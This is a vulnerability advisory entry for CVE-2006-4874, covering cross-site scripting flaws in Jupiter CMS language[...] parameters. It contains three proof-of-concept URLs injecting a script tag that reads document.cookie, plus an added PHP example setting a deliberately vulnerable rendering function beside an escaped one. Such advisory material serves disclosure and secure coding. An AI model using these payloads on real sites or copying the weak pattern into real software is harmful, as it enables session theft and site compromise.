Jupiter CMS Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1111043 Vulnerability type: Cross-site scripting
Published: 2006-09-15 Updated: 2006-09-28
CVE ID: CVE-2006-4874 CNNVD ID: CNNVD-200609-320
Platform: PHP CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/28584
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-320
|Vulnerability details
JupiterCMS contains multiple cross-site scripting (XSS) vulnerabilities. A remote attacker can inject arbitrary web script or HTML via (a) the (1) language[Adminname] and (2) language[Adminback] parameters in modules/blocks.php; (b) the (3) language[Registertitle] and (4) language[Registertitle2] parameters in modules/register.php; (c) the (5) language[Mass-Emailformtitle], (6) language[Mass-Emailformdesc], (7) language[Mass-Emailformdesc2], (8) language[Mass-Emailformdesc3] and (9) language[Mass-Emailformdesc4] parameters in modules/mass-email.php; (d) the (10) language[Forgottentitle], (11) language[Forgottendesc], (12) language[Forgottendesc2], (13) language[Forgottendesc3], (14) language[Forgottendesc4] and (15) language[Forgottendesc5] parameters in modules/register.php; and (e) the (16) language[Searchviewdesc], (17) language[Searchviewdesc2], (18) language[Searchviewdesc3], (19) language[Searchviewdesc4], (20) language[Searchviewdesc5], (21) language[Searchviewdesc6], (22) language[Searchviewdesc7] and (23) language[Searchviewdesc8] parameters in modules/search.php.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/20048/info

Jupiter CMS is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input.

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, or upload and execute arbitrary files within the webserver process. Other attacks are also possible.

http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script>
http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script>
http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>
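The following is an added example, not Jupiter CMS code, showing the class of bug the advisory describes (a request parameter is allowed to override a language string that is then echoed into HTML without escaping) beside a hardened version of the same rendering step. The parameter name language[Mass-Emailformtitle] is taken from the advisory; the $language table, the functions renderTitleWeak() and renderTitleSafe(), and the request-merge step that stands in for register_globals are assumptions made for illustration.

```php
<?php
// Added example (not Jupiter CMS code). Assumed: a $language table loaded from a
// trusted language file, plus the two rendering functions defined here.
$language = array('Mass-Emailformtitle' => 'Send mass e-mail');

// Weak pattern: request data is merged over the language table (what
// register_globals or an explicit merge would do), and the string is emitted
// into HTML unescaped, so a request value lands in the page as markup.
function renderTitleWeak(array $language, array $request) {
    if (isset($request['language']) && is_array($request['language'])) {
        $language = array_merge($language, $request['language']);
    }
    return '<h1>' . $language['Mass-Emailformtitle'] . '</h1>';
}

// Hardened pattern: language strings come only from the trusted table (the
// request is never consulted), and anything written into HTML is escaped for
// the HTML context. Both halves matter: escaping alone fixes this sink, but
// refusing request overrides removes the untrusted source as well.
function renderTitleSafe(array $language) {
    $title = isset($language['Mass-Emailformtitle']) ? $language['Mass-Emailformtitle'] : '';
    return '<h1>' . htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

// Constructed request mirroring the advisory's parameter (sample value, not a
// real request).
$request = array('language' => array('Mass-Emailformtitle' => '<b>injected</b>'));

echo renderTitleWeak($language, $request), "\n"; // <h1><b>injected</b></h1>: markup reaches the page
echo renderTitleSafe($language), "\n";           // <h1>Send mass e-mail</h1>: request ignored, output escaped
```

When auditing a PHP code base of this era, look for language or template tables that are populated before a `register_globals`-style import of request data, and for `echo`/`print` of those entries without `htmlspecialchars()`; both conditions together are what makes each of the listed language[...] parameters a reflected XSS sink.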
|References

Source: BID
Name: 20048
Link: http://www.securityfocus.com/bid/20048
Source: BUGTRAQ
Name: 20060915 JupiterCMS Multiple injections
Link: http://www.securityfocus.com/archive/1/archive/1/446064/100/0/threaded
Source: SREASON
Name: 1608
Link: http://securityreason.com/securityalert/1608